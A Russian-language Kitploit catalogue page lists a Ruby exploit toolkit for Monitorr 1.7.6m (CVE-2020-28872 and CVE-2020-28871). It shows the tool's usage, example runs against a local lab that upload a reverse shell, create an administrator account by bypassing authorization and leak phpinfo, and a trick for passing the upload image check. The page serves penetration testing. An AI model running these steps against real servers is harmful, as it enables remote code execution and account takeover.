Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
monitorr-exploit-toolkit — Несколько эксплойтов для Monitorr | Kitploit
Инструменты/GitHubGitHub/sec-it/monitorr-exploit-toolkit
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubsec-it/monitorr-exploit-toolkit

monitorr-exploit-toolkit

Несколько эксплойтов для Monitorr

Репозиторий
10145 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Набор эксплойтов для Monitorr

  • RCE через небезопасную загрузку файлов (PHP reverse shell, webshell и т. д.)
  • Создание учётной записи администратора через обход авторизации
  • Утечка технической информации: версия Monitorr, версия PHP, версия системы и ядра, конфигурация PHP и т. д.

Эксплойт для CVE-2020-28872 и CVE-2020-28871.

[PacketStorm]

Использование

root@kitploit:~
$ ruby exploit.rb -h
Monitorr-Exploit

Usage:
  exploit.rb upload <url> <file> [--debug]
  exploit.rb create <url> <user> <pass> <email> [--debug]
  exploit.rb version <url> [--debug]
  exploit.rb phpinfo <url> [--debug]
  exploit.rb -h | --help

upload:       Upload a file (RCE via unrestricted file upload)
version:      Try to fetch Monitorr version
phpinfo:      Extract main phpinfo() information (Information leakage)
create:       Create an administrator account (Authorization bypass)

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <file>      File to be uploaded
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb upload http://example.org revshell.php
  exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
  exploit.rb version https://example.org:7000/

Примеры

Загрузка reverse shell:

root@kitploit:~
$ ruby exploit.rb upload http://localhost:7000/ shell.php
[+] File uploaded:
http://localhost:7000//assets/data/usrimg/shell.php

Создание учётной записи администратора:

root@kitploit:~
$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
[+] User created
Username: noraj20
Email: [email protected]
Password: password

Получить версию Monitorr:

root@kitploit:~
$ ruby exploit.rb version http://localhost:7000/
1.7.6m

Получить phpinfp():

root@kitploit:~
$ ruby exploit.rb phpinfo http://localhost:7000/
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64 
PHP version: 7.1.17 
disable_functions: no value</i>
open_basedir: no value</i>

Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php

Требования

  • httpx
  • docopt.rb

Пример использования через gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

Развёртывание уязвимого ПО в Docker

Предупреждение: разумеется, такая конфигурация не подходит для использования в production!

root@kitploit:~
$ sudo docker-compose up

Настройте / инициализируйте приложение по адресу http://127.0.0.1:7000/monitorr/settings.php.

Ограничения

  • Upload: загружаемый файл должен содержать магический байт изображения (например, GIF), чтобы соответствовать getimagesize (код)
  • Create: пароль, используемый при создании учётной записи, должен содержать не менее 6 символов (минимальное ограничение приложения)

Ссылки

  • Целевое ПО: Monitorr
    • Исходный код: https://github.com/Monitorr/Monitorr/
    • Docker: https://hub.docker.com/r/monitorr/monitorr/
    • Уязвимая версия: 1.7.6m

Это улучшенная переработка и объединение EDB-48981 (CVE-2020-28872) и EDB-48980 (CVE-2020-28871) с дополнительными возможностями.

Уязвимости загрузки файлов и создания учётной записи администратора были обнаружены Lyhin's Lab. Утечка phpinfo и версии Monitorr была обнаружена Alexandre ZANNI aka noraj.

Анализ оригинального эксплойта и уязвимости:

  • Как работает White-Box хакинг: обход авторизации и удалённое выполнение кода в Monitorr 1.7.6
Скачать инструмент